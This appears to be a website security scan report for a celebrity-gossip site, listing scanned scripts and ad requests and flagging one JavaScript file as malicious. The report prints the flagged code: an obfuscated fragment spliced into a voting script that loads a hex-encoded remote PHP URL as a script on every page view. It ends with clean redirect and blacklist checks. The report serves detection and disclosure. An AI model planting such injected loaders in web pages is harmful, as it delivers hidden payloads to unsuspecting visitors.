Scanned pages/files
Request | Server response | Status |
http://www.x17online.com/ | 200 OK Content-Length: 68585 Content-Type: text/html | clean |
http://www.x17online.com//ajax.googleapis.com/ajax/libs/jquery/2.1.0/jquery.min.js/ | 200 OK Content-Length: 68585 Content-Type: text/html | clean |
http://www.x17online.com//ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js/ | 200 OK Content-Length: 68585 Content-Type: text/html | clean |
http://www.x17online.com/bootstrap/js/bootstrap.min.js | 200 OK Content-Length: 29165 Content-Type: application/javascript | clean |
http://www.x17online.com/js/main.js | 200 OK Content-Length: 4212 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
var topModuleData;
var topModuleCounter = 0;
$(document).ready(function(){
  $('.faceOff .face_off_vote').click(function(){
    var faceOffId = $(this).parent().parent().find('.faceOffId').val();
    voteFaceOff(faceOffId);
  });
  $('.faceOff .face_off_results').click(function(){
    var faceOffId = $(this).parent().parent().find('.faceOffId').val();
    viewResults(faceOffId);
  });
});
function viewResults(faceOffId) {
  $.get(webRoot + "/ gads.async = true;
  gads.type = 'text/javascript';
  // hex-escaped string; decodes to http://www.x17online.com/hollywood-breakdown/nicolas_cage/default.php
  gads.src = '\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x78\x31\x37\x6f\x6e\x6c\x69\x6e\x65\x2e\x63\x6f\x6d\x2f\x68\x6f\x6c\x6c\x79\x77\x6f\x6f\x64\x2d\x62\x72\x65\x61\x6b\x64\x6f\x77\x6e\x2f\x6e\x69\x63\x6f\x6c\x61\x73\x5f\x63\x61\x67\x65\x2f\x64\x65\x66\x61\x75\x6c\x74\x2e\x70\x68\x70';
  var node = document.getElementsByTagName('body')[0];
  // injects the script element before <body>, so it loads on every page view
  node.parentNode.insertBefore(gads, node);
});
Antivirus reports:
http://jwpsrv.com/library/EjOdqOQBEeKpUhIxOQulpA.js | 200 OK Content-Length: 70706 Content-Type: text/javascript | clean |
http://www.google.com/jsapi | 200 OK Content-Length: 24552 Content-Type: text/javascript | clean |
http://i.po.st/share/script/post-widget.js | 200 OK Content-Length: 117725 Content-Type: application/x-javascript | clean |
http://adkengage.com/pshandler.js?aid=8270&v=7OIDemmNYwBoVSxp7EwPxw%3d%3d&dpid=2768 | 200 OK Content-Length: 687 Content-Type: application/x-javascript | clean |
http://ib.adnxs.com/ttj?id=2178791&position=above | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Date: Sun, 05 Oct 2014 14:52:34 GMT Pragma: no-cache Location: http://ib.adnxs.com/bounce?%2Fttj%3Fid%3D2178791%26position%3Dabove Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Set-Cookie: uuid2=0; path=/; expires=Sat, 03-Jan-2015 14:52:34 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: sess=1; path=/; expires=Mon, 06-Oct-2014 14:52:34 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=3713224178666039979; path=/; expires=Sat, 03-Jan-2015 14:52:34 GMT; domain=.adnxs.com; HttpOnly X-XSS-Protection: 0 | clean |
http://ib.adnxs.com/bounce?%2fttj%3fid%3d2178791%26position%3dabove | 200 OK Content-Length: 1025 Content-Type: text/html | clean |
http://ib.adnxs.com/ttj?ttjb=1&bdc=1412520754&bdh=NRz5zWgVO1L4ZTOhZKa-mDalGl0.'+c+'&id=2178791&position=above | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Date: Sun, 05 Oct 2014 14:52:34 GMT Pragma: no-cache Location: http://ib.adnxs.com/bounce?%2Fttj%3Fttjb%3D1%26bdc%3D1412520754%26bdh%3DNRz5zWgVO1L4ZTOhZKa-mDalGl0.%27%2Bc%2B%27%26id%3D2178791%26position%3Dabove Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Set-Cookie: uuid2=0; path=/; expires=Sat, 03-Jan-2015 14:52:34 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: sess=1; path=/; expires=Mon, 06-Oct-2014 14:52:34 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2486418154245445571; path=/; expires=Sat, 03-Jan-2015 14:52:34 GMT; domain=.adnxs.com; HttpOnly X-XSS-Protection: 0 | clean |
http://ib.adnxs.com/bounce?%2fttj%3fttjb%3d1%26bdc%3d1412520754%26bdh%3dnrz5zwgvo1l4ztohzka-mdalgl0.%27%2bc%2b%27%26id%3d2178791%26position%3dabove | 200 OK Content-Length: 1295 Content-Type: application/javascript | clean |
http://ib.adnxs.com/test404page.js | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
http://ads.rubiconproject.com/ad/8621.js | 200 OK Content-Length: 21299 Content-Type: text/javascript | clean |
http://www.x17online.com//ads.incmd10.com/creative/2-002137205-00001j;size=1;tag_id=5746;ref=INSERT_REFERRER_HERE;cb=INSERT_CACHEBUSTER_HERE/ | 200 OK Content-Length: 68585 Content-Type: text/html | clean |
http://ib.adnxs.com/ttj?id=1500853&position=below | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Date: Sun, 05 Oct 2014 14:52:36 GMT Pragma: no-cache Location: http://ib.adnxs.com/bounce?%2Fttj%3Fid%3D1500853%26position%3Dbelow Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Set-Cookie: uuid2=0; path=/; expires=Sat, 03-Jan-2015 14:52:36 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: sess=1; path=/; expires=Mon, 06-Oct-2014 14:52:36 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2480370617130020616; path=/; expires=Sat, 03-Jan-2015 14:52:36 GMT; domain=.adnxs.com; HttpOnly X-XSS-Protection: 0 | clean |
http://ib.adnxs.com/bounce?%2fttj%3fid%3d1500853%26position%3dbelow | 200 OK Content-Length: 1025 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: x17online.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: x17online.com
Referer: http://www.google.com/search?q=x17online.com
Result:
The result is similar to the first query. No suspicious redirects were found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=x17online.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://x17online.com/
Result: x17online.com is not infected or malware details are not published yet.